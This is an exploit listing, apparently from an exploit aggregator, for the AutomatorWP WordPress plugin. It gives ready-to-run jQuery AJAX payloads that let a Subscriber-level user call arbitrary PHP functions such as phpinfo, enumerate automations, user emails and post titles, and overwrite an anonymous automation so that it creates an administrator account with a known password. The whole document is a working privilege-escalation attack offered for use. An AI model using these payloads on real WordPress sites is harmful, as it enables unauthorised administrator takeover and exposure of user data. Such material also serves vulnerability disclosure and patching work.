## https://sploitus.com/exploit?id=WPEX-ID:5916EA42-EB33-463D-8528-2A142805C91F
Attack Procedures
1) Run this in Dashboard while logged in as Subscriber to get phpinfo (or other functions') result. Note that no arguments are passed to the function:
jQuery.post(ajaxurl,{action:"automatorwp_get_posts",nonce:automatorwp_admin_notices.nonce,post_type_cb:"phpinfo"})
2) Run this to enumerate automations:
jQuery.post(ajaxurl,{action:"automatorwp_get_objects",nonce:automatorwp_admin_notices.nonce,q:"",table:"automatorwp_automations"})
or, user emails:
jQuery.post(ajaxurl,{action:"automatorwp_get_users",nonce:automatorwp_admin_notices.nonce,q:""})
or, post titles:
jQuery.post(ajaxurl,{action:"automatorwp_get_posts",nonce:automatorwp_admin_notices.nonce})
3) Run this to overwrite an Anonymous automation. Since an anonymous automations can be configured to create a new user with any role, including Administrator role and pre-defined passwords, this will allow privilege escalation. "id" is different from the automatio ID; however this can be brute-forced easily.
jQuery.post(ajaxurl,{action:"automatorwp_update_item_option",existing_user_not_exists:"new_user",first_name:"",id:"1"/* CHANGE THIS */,item_type:"action",last_name:"",new_user_exists: "abort",new_user_search_field: "email",nonce:automatorwp_admin_notices.nonce,option_name: "user",role: "administrator",run_actions_on: "existing_user",search_field: "login",search_field_value: "automatorwp-privesc",user_email: "automatorwp-privesc@example.com",user_login: "automatorwp-privesc","user_meta[0][meta_key]": "","user_meta[0][meta_value]": "",user_pass: "escalated",user_url: ""})
Run this and when the automation triggers a new user is created. you can log in as "automatorwp-privesc" with password "escalated". You can also overwrite when the automation triggers via "automatorwp_add_automation_item" ajax.